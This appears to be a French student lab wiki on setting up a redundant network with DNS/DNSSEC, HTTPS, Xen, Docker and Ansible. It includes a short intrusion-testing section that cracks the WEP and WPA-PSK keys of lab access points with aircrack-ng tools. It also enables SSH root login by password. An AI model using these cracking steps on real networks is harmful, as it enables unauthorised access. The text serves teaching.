En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52017</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52017"/>
				<updated>2020-01-05T15:12:19Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Liaison R1 vers COM-1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
